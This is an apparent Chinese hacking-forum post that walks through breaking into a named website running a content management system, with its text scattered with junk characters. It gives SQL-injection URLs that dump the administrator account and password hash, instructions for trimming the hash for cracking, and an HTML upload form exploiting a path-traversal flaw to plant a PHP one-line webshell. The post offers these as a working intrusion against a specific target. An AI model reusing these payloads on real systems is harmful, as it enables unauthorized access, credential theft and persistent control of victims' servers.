①注入漏洞。; J0 B. O+ @; E+ F6 `: [; s3 H2 ?
这站 http://www.political-security.com// ]2 C' S% p2 z- @, }5 ~! p
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
. Q; d; V6 _ C0 Cwww.political-security.com/data/mysql_error_trace.inc 爆后台7 J& u4 w& [* U! a
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。+ C' h- h3 c: Z9 L. A
然后写上语句
~8 e* i e* e/ ~查看管理员帐号
! e E) N- O8 w" Q2 q2 x" ~http://www.political-security.co ... &membergroup=@`
0 v: M$ ^5 c# j" j+ K- Y" y4 D! ?! C( Z# ?+ H$ Q2 r) d
admin
% D8 w2 [+ ]% h+ [+ @' u; R4 H: }3 W
查看管理员密码* h- j! r* j% c- u0 O# l
http://www.political-security.co ... &membergroup=@`! H5 d7 [' U- ^( ^4 x# j5 }
# g' P+ q* N1 c9 l( q1 D8d29b1ef9f8c5a5af429) m" S, A% ]1 z+ ?7 T X" p4 p$ m
. a" [7 |' [0 q! [, ^查看管理员密码+ L0 I" z8 H: h4 U. X
, C. }) i) P, C& o# d
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5* u* S0 w. L; c& z
4 ^9 `2 G& n. p: ?1 |
8d2
1 ~( y% J& @; D9 B- H: J9b1ef9f8c5a5af42
2 @# o- h* |9 P: h, |$ g @$ |1 P9
2 V) U$ i4 ]% E% _9 w# E! L2 u8 _7 n& r/ y, f
cmd5没解出来 只好测试第二个方法
8 C1 `3 q7 [; H8 r
% S7 p1 w8 l( {- i3 O6 z
2 }5 ?1 J: P1 h, O+ u②上传漏洞:
, r' B% ]* `6 T& J7 B$ y3 `4 R- |) r8 v$ f" \8 k0 s* ~- L1 f
只要登陆会员中心,然后访问页面链接
, k) O. D- P/ w+ l& x# r9 O“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”$ P2 r) ], s, [: c6 D: l$ k1 N- W! V
f; b6 G7 E6 S9 W如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”5 u/ Z2 ^; {2 A# D5 |+ y) g
5 R) ?( ^& [. ?2 [
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm; o2 d9 t+ ^8 G, j! K9 Q
6 \8 X6 c, B+ c7 S) `( r- B( K
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
! Z+ C& G4 ?4 Y4 L或者: Q% S8 ]% Q# [# y
即可上传成功 |